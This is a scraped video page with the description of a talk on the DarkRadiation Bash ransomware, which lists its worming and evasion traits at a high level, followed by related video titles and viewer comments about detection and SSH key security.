SSH wormable, written in Bash, updates itself and hard to detect. The DarkRadiation ☢️ Ransomware

preview_player
Показать описание
This new ransomware is cut from a different cloth. Let us discuss

* SSH Wormable
* Encrypts with AES (OpenSSL)
* It mutates so anti-viruses can’t catch it
* Bash
* Still under development

Support my work on PayPal

Become a Member on YouTube

🧑‍🏫 Courses I Teach

🏭 Backend Engineering Videos in Order

💾 Database Engineering Videos

🎙️Listen to the Backend Engineering Podcast

Gears and tools used on the Channel (affiliates)

🖼️ Slides and Thumbnail Design
Canva

🎙️ Mic Gear
Shure SM7B Cardioid Dynamic Microphone

Cloudlifter

XLR cables

Focusrite Audio Interface

📷 Camera Gear
Canon M50 Mark II

Micro HDMI to HDMI

Video capture card

AC Wall for constant power

Stay Awesome,
Hussein
  1. Hussein Nasser
  2. hussein nasser
  3. backend engineering
  4. ransomware
  5. DarkRadiation
  6. darkraditation ransomware
Рекомендации по теме
SSH wormable, written 0:15:40

SSH wormable, written in Bash, updates itself and hard to detect. The DarkRadiation ☢️ Ransomware...

DarkRadiation Explained. Bash 0:30:25

DarkRadiation Explained. Bash Ransomware Darkradiation targets Red Hat | DarkRadiation targets linux

THE POWER OF 0:08:50

THE POWER OF SHELL SCRIPTING #4BugsWriter

Ransomware example 0:05:08

Ransomware example

Weaponizing Rsync 0Day 0:21:52

Weaponizing Rsync 0Day Vulnerability by Ege BALCI

⚠️ XWORM V3 0:02:42

⚠️ XWORM V3 HVNC | HIDDEN CHROME, BRAVE , FIREFOX & MORE

Microsoft Awards them 0:08:21

Microsoft Awards them $20k for finding one of a kind XSS bug in Edge

TWIM Episode 9 0:05:10

TWIM Episode 9 Part 3: Java-Based Tycoon Ransomware Targets Windows & Linux PCs

HackerKast Episode 2 0:08:04

HackerKast Episode 2 - Shellshock

Facebook Awarded him 0:09:47

Facebook Awarded him $30,000 for Finding a Critical Instagram Bug

TryHackMe Skynet [Solved] 0:51:59

TryHackMe Skynet [Solved]

Muito além do 0:04:16

Muito além do Gnu - A shell Zsh

TUTORIAL 1310 Securing 0:50:59

TUTORIAL 1310 Securing SLES for SAP Applications in the public cloud

Android Ransomware (Cyber 0:03:56

Android Ransomware (Cyber World News)

CyberSecurity Weekly Hacker 0:34:29

CyberSecurity Weekly Hacker News May 16 - 23, 2022

Using Zeek/Bro To 1:01:16

Using Zeek/Bro To Discover Network TTPs of MITRE ATT&CK™ Part 2

Cybersecurity Weekly hackers 0:58:16

Cybersecurity Weekly hackers news Dec 12-19, 2022 #hacker #hackernews #cybersecurity #databreach

Комментарии
Автор

That small giggle at the end after discovering something weird / cool is the feeling we have had at least once.

kevinshah_tv
Автор

I subscribed to you because of this video!
Great job. Look forward to watching all your other videos.

LVLV
Автор

Lateral network movement can be quite easily detected by using a network anomaly detection solution. Also, a firewall with IPS and Antibot can be quite useful for detecting CnC, but would require some engineering to properly implement it :). Great video. Great attack :)

JernMr
Автор

They way I see it, this is wormable, but not yet a worm. It doesn't spread by itself, it's spread through commands from C&C. This one is definitely not the first (although these things are less common on Linux, but more common on Windows), the Bash obfuscation is pretty new though. Most just try to hide their processes and files (this one tries to do the same).
7:02 maybe Red Buts ? (possibly red butts ?)
9:54 the developer computer has the private key, so the developer computer needs to be infected. But usually incoming SSH is turned off on laptops and the laptop is behind NAT and not directly Internet connected.
12:12 pretty certain the attacker obfuscates it before uploading to a victim. They were just able to recognize the method that was used.
15:28 emojies are just Unicode characters and Unicode characters are allowed in filenames.

autohmae
Автор

I find it absolutely fascinating. I wonder what it will be like when they start using more advanced AI (imagine asking GPT v10 to build you a never seen before virus)

yourpersonaldatadealer
Автор

As a linux user, I really want to take a look at bash source code.

AbhinavKulshreshtha
Автор

That is why you have to use a password on your keypair.

professortrog
Автор

Dear fellow viewer, are there more channels which talk about similar backend and SW analysis?

NaveenTulsi
Автор

Well, we were also hit by a worm. They were mining bitcoin on our machine. Our dev machine got extremely slow and then we saw most of our CPU was being eaten by bitcoin mining process. Later we figured out that it came from postgres port which we were using to connect dev db to our local machine.

nikhilsinghal
Автор

Ransomware updating themselves. This seems to be the most dangerous feature.

It should be an update registration and every service running should have it's own user to stop random applications to have root access.

Also, the pgp or hashing habilities should be exclusive to very few absolutely necessary applications. Not everything needs to be encrypted.
.

gmanon
Автор

Please kindly upload videos on AWS AND AZURE ISSUES AND TROUBLESHOOTING

supriyochatterjee
Автор

13:15 This is why human will corrupt advance AI in future resulting in total chaos

UzairAli
Автор

Node brought us the best and worst of the Web

siya.abc
Автор

shouldn't be too hard to create such script

MartinsTalbergs